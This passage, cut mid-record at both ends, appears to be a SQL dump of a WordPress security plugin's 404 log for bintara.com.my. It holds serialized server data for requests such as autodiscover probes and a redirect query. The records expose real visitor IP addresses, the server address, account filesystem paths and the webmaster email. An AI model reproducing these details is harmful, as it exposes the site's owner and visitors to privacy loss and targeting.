";s:12:\"REQUEST_TIME\";s:10:\"1569460506\";}}','notice','2019-09-26 01:15:08','2019-09-26 01:15:06',31104912,32918232,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(27061,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_KEEP_ALIVE\";s:2:\"15\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"136.243.199.108\";s:11:\"REMOTE_PORT\";s:5:\"59971\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwMiMIxHKnBK@s1FlddRgAAAUQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569459336.6365\";s:12:\"REQUEST_TIME\";s:10:\"1569459336\";}}','notice','2019-09-26 00:55:38','2019-09-26 00:55:37',30824632,32639784,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'136.243.199.108'),(27060,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:64:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"315\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:2:\"on\";s:7:\"H2_PUSH\";s:2:\"on\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"335-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"en-us\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:16:\"Microsoft Office\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:3:\"Mac\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"59393FCE-AC0E-4A2D-B679-CEEBD7BDF72F\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.29.917\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:2:\"on\";s:16:\"REDIRECT_H2_PUSH\";s:2:\"on\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"335-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwMGMIxHKnBK@s1Fldc@AAAAAE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"49554\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwMGMIxHKnBK@s1Fldc@AAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569459224.3117\";s:12:\"REQUEST_TIME\";s:10:\"1569459224\";}}','notice','2019-09-26 00:53:46','2019-09-26 00:53:44',31102768,32915520,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(27059,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"319\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"E2515484-ED4B-4C90-8145-782243FBF17D\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYwLnBUSlOK4dwtqdubZxAAAAFc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.145.128\";s:11:\"REMOTE_PORT\";s:5:\"57425\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYwLnBUSlOK4dwtqdubZxAAAAFc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569459100.961\";s:12:\"REQUEST_TIME\";s:10:\"1569459100\";}}','notice','2019-09-26 00:51:43','2019-09-26 00:51:41',31099248,32911104,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.145.128'),(26980,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:84:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569409625.9174408912658691406250\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569409625.9174408912658691406250\";s:15:\"HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_CONTENT_LENGTH\";s:1:\"0\";s:30:\"REDIRECT_REDIRECT_CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:39:\"REDIRECT_REDIRECT_CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:32:\"REDIRECT_REDIRECT_CONTEXT_PREFIX\";s:0:\"\";s:31:\"REDIRECT_REDIRECT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:29:\"REDIRECT_REDIRECT_ERROR_NOTES\";s:54:\"Script timed out before returning headers: wp-cron.php\";s:35:\"REDIRECT_REDIRECT_GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:29:\"REDIRECT_REDIRECT_HTTP_ACCEPT\";s:3:\"*/*\";s:38:\"REDIRECT_REDIRECT_HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:33:\"REDIRECT_REDIRECT_HTTP_CONNECTION\";s:5:\"close\";s:27:\"REDIRECT_REDIRECT_HTTP_HOST\";s:14:\"bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_REFERER\";s:82:\"https://bintara.com.my/wp-cron.php?doing_wp_cron=1569409625.9174408912658691406250\";s:33:\"REDIRECT_REDIRECT_HTTP_USER_AGENT\";s:39:\"WordPress/5.1.2; https://bintara.com.my\";s:30:\"REDIRECT_REDIRECT_HTTP_X_HTTPS\";s:1:\"1\";s:22:\"REDIRECT_REDIRECT_PATH\";s:180:\"/usr/local/jdk/bin:/usr/kerberos/sbin:/usr/kerberos/bin:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/usr/X11R6/bin:/usr/local/bin:/usr/X11R6/bin:/root/bin:/opt/bin\";s:30:\"REDIRECT_REDIRECT_QUERY_STRING\";s:47:\"doing_wp_cron=1569409625.9174408912658691406250\";s:29:\"REDIRECT_REDIRECT_REMOTE_ADDR\";s:12:\"103.6.198.69\";s:29:\"REDIRECT_REDIRECT_REMOTE_PORT\";s:5:\"51234\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:32:\"REDIRECT_REDIRECT_REQUEST_SCHEME\";s:5:\"https\";s:29:\"REDIRECT_REDIRECT_REQUEST_URI\";s:60:\"/wp-cron.php?doing_wp_cron=1569409625.9174408912658691406250\";s:33:\"REDIRECT_REDIRECT_SCRIPT_FILENAME\";s:52:\"/home/norfaiz/public_html/bintara.com.my/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SCRIPT_NAME\";s:12:\"/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:29:\"REDIRECT_REDIRECT_SERVER_ADDR\";s:12:\"103.6.198.69\";s:30:\"REDIRECT_REDIRECT_SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:29:\"REDIRECT_REDIRECT_SERVER_NAME\";s:14:\"bintara.com.my\";s:29:\"REDIRECT_REDIRECT_SERVER_PORT\";s:3:\"443\";s:33:\"REDIRECT_REDIRECT_SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:34:\"REDIRECT_REDIRECT_SERVER_SIGNATURE\";s:0:\"\";s:33:\"REDIRECT_REDIRECT_SERVER_SOFTWARE\";s:6:\"Apache\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"500\";s:29:\"REDIRECT_REDIRECT_SUPHP_GROUP\";s:7:\"norfaiz\";s:31:\"REDIRECT_REDIRECT_SUPHP_HANDLER\";s:28:\"application/x-httpd-ea-php56\";s:28:\"REDIRECT_REDIRECT_SUPHP_USER\";s:7:\"norfaiz\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XYtKWWE34CWnhBYozkDPiwAAAMY\";s:19:\"REDIRECT_SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:12:\"/wp-cron.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"500\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtKWWE34CWnhBYozkDPiwAAAMY\";s:12:\"REDIRECT_URL\";s:10:\"/500.shtml\";s:11:\"REMOTE_ADDR\";s:12:\"103.6.198.69\";s:11:\"REMOTE_PORT\";s:5:\"51234\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:34:\"https://bintara.com.my/wp-cron.php\";s:10:\"SCRIPT_URL\";s:12:\"/wp-cron.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtKWWE34CWnhBYozkDPiwAAAMY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569410539.4534\";s:12:\"REQUEST_TIME\";s:10:\"1569410539\";}}','notice','2019-09-25 11:22:24','2019-09-25 11:22:23',30794488,31047424,'https://bintara.com.my/wp-cron.php?doing_wp_cron=1569409625.9174408912658691406250',1,0,'103.6.198.69'),(26981,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:33:\"gzip, deflate;q=1.0, identity;q=0\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:115:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.121 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"5.62.43.170\";s:11:\"REMOTE_PORT\";s:4:\"4051\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtOMHlb-cYDmeWuuuf7wAAAAEA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569410611.3756\";s:12:\"REQUEST_TIME\";s:10:\"1569410611\";}}','notice','2019-09-25 11:23:34','2019-09-25 11:23:31',31210048,33023152,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'5.62.43.170'),(26982,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/2\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/2\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtPYGE34CWnhBYozkDQrQAAANU\";s:12:\"REDIRECT_URL\";s:2:\"/2\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"55010\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/2\";s:10:\"SCRIPT_URL\";s:2:\"/2\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtPYGE34CWnhBYozkDQrQAAANU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569410912.8451\";s:12:\"REQUEST_TIME\";s:10:\"1569410912\";}}','notice','2019-09-25 11:28:42','2019-09-25 11:28:33',31151232,32964584,'https://bintara.com.my/2',1,0,'198.27.69.176'),(26983,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:42:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:2:\"/3\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:10:\"HTTP_RANGE\";s:15:\"bytes=0-1000000\";s:12:\"HTTP_REFERER\";s:23:\"http://bintara.com.my/3\";s:15:\"HTTP_USER_AGENT\";s:77:\"Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:19:\"REDIRECT_SCRIPT_URL\";s:2:\"/3\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYtPdHlb-cYDmeWuuuf73AAAAEM\";s:12:\"REDIRECT_URL\";s:2:\"/3\";s:11:\"REMOTE_ADDR\";s:13:\"198.27.69.176\";s:11:\"REMOTE_PORT\";s:5:\"45076\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:24:\"https://bintara.com.my/3\";s:10:\"SCRIPT_URL\";s:2:\"/3\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYtPdHlb-cYDmeWuuuf73AAAAEM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569410932.7469\";s:12:\"REQUEST_TIME\";s:10:\"1569410932\";}}','notice','2019-09-25 11:28:54','2019-09-25 